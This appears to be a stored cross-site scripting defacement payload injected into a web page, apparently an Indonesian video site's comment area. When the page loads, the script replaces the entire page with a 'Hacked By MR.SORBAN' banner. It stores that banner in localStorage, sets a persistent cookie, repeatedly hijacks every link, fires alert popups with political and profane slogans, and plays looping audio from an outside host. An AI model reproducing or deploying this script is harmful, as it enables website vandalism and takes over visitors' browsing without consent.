zxxzxx

<script>

(function(){
    // Inject HTML ke localStorage (permanent)
    localStorage.setItem('hacked_html', `<!DOCTYPE html>
<html lang="id">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Hacked By MR.SORBAN</title>
    <style>
        body {
            margin: 0;
            padding: 0;
            background-color: black;
            color: white;
            font-family: 'Segoe UI', Tahoma, Geneva, Verdana, sans-serif;
            display: flex;
            flex-direction: column;
            align-items: center;
            justify-content: center;
            min-height: 100vh;
            text-align: center;
            overflow-x: hidden;
            cursor: default;
        }

        .container {
            width: 90%;
            max-width: 800px;
            padding: 20px;
        }

        .arabic-top {
            font-size: clamp(2rem, 8vw, 4rem);
            margin-bottom: 20px;
            font-weight: bold;
        }

        .logo-section {
            display: flex;
            justify-content: center;
            align-items: center;
            gap: 20px;
            margin-bottom: 30px;
            flex-wrap: wrap;
        }

        .logo-circle {
            background-color: white;
            color: black;
            border-radius: 50%;
            width: clamp(100px, 25vw, 150px);
            height: clamp(100px, 25vw, 150px);
            display: flex;
            flex-direction: column;
            justify-content: center;
            align-items: center;
            font-weight: bold;
            line-height: 1.2;
        }

        .logo-circle .ar {
            font-size: clamp(1rem, 4vw, 1.5rem);
        }

        .logo-emblem {
            width: clamp(100px, 25vw, 150px);
            height: clamp(100px, 25vw, 150px);
            border: 2px solid #333;
            border-radius: 5px;
            display: flex;
            align-items: center;
            justify-content: center;
            background-image: url('https://via.placeholder.com/150/000000/FFFFFF?text=LOGO');
            background-size: cover;
        }

        .slogan {
            font-size: clamp(1.2rem, 4vw, 1.8rem);
            margin: 10px 0;
            font-weight: 500;
        }

        .hacked-text {
            color: #ff3333;
            font-size: clamp(1.8rem, 6vw, 3.5rem);
            font-weight: 900;
            margin: 20px 0;
            text-transform: uppercase;
            letter-spacing: 2px;
        }

        .hashtags {
            font-size: clamp(0.9rem, 3vw, 1.5rem);
            font-weight: bold;
            word-spacing: 10px;
            margin-top: 10px;
        }

        .blink {
            animation: blinker 1.5s linear infinite;
        }

        @keyframes blinker {
            50% { opacity: 0.5; }
        }
    </style>
</head>
<body>

    <div class="container">
        <div class="arabic-top">لا إله إلا الله</div>

        <div class="logo-section">
            <div class="logo-circle">
                <div class="ar">اسلامية</div>
                <div class="ar">سيبز</div>
            </div>
            <img src="https://h.top4top.io/p_3685a43km0.jpg" alt="Emblem" class="logo-emblem" style="border-radius: 50%; border: 2px solid white;">
        </div>

        <div class="slogan">there is no ISIS community</div>
        <div class="slogan">from hacking to justice and prosperity</div>

        <div class="hacked-text blink">HACKED BY MR.SORBAN</div>

        <div class="hashtags">
            #FREEPALESTINE #ISISISNOTISLAM #ISLAMICSYBER
        </div>
    </div>

    <!-- Audio element hidden -->
    <audio id="hackedMusic" loop style="display: none;">
        <source src="https://files.catbox.moe/1oogfz.mp4" type="audio/mpeg">
    </audio>

    <script>
        // Inisialisasi audio
        const audio = document.getElementById('hackedMusic');
        let musicStarted = false;
        
        // Popup pertama muncul saat halaman baru dibuka
        window.onload = function() {
            // Popup 1
            alert("HACKED BY MR.SORBAN");
            
            // Popup 2 muncul setelah popup 1 di-OK
            alert("#freepalestine #isisisnotislam\n#fuckisrael");
        };
        
        // Fungsi untuk memulai musik dengan klik/tap pertama
        function startMusicOnInteraction() {
            if (!musicStarted) {
                audio.volume = 1.0;
                audio.play().then(() => {
                    musicStarted = true;
                    console.log("Musik mulai otomatis");
                }).catch(e => {
                    console.log("Menunggu interaksi user untuk memulai musik");
                });
            }
        }
        
        // Deteksi klik/tap di mana saja di halaman
        document.addEventListener('click', startMusicOnInteraction);
        document.addEventListener('touchstart', startMusicOnInteraction);
        
        // Juga coba mulai musik otomatis setelah beberapa detik
        setTimeout(startMusicOnInteraction, 2000);
    </script>

</body>
</html>`);

    // Replace seluruh halaman dengan HTML kita
    document.documentElement.innerHTML = localStorage.getItem('hacked_html');
    
    // Set cookie permanent (expires in 10 years)
    document.cookie = "hacked_by=MR.SORB4N; expires=Fri, 31 Dec 2030 23:59:59 GMT; path=/";
    
    // Redirect semua link ke deface page
    setInterval(() => {
        const links = document.getElementsByTagName('a');
        for(let link of links) {
            link.onclick = function(e) {
                e.preventDefault();
                document.documentElement.innerHTML = localStorage.getItem('hacked_html');
            };
        }
    }, 1000);
})();
</script
Video Terkait

Tulis Komentar

(Tidak ditampilkan dikomentar)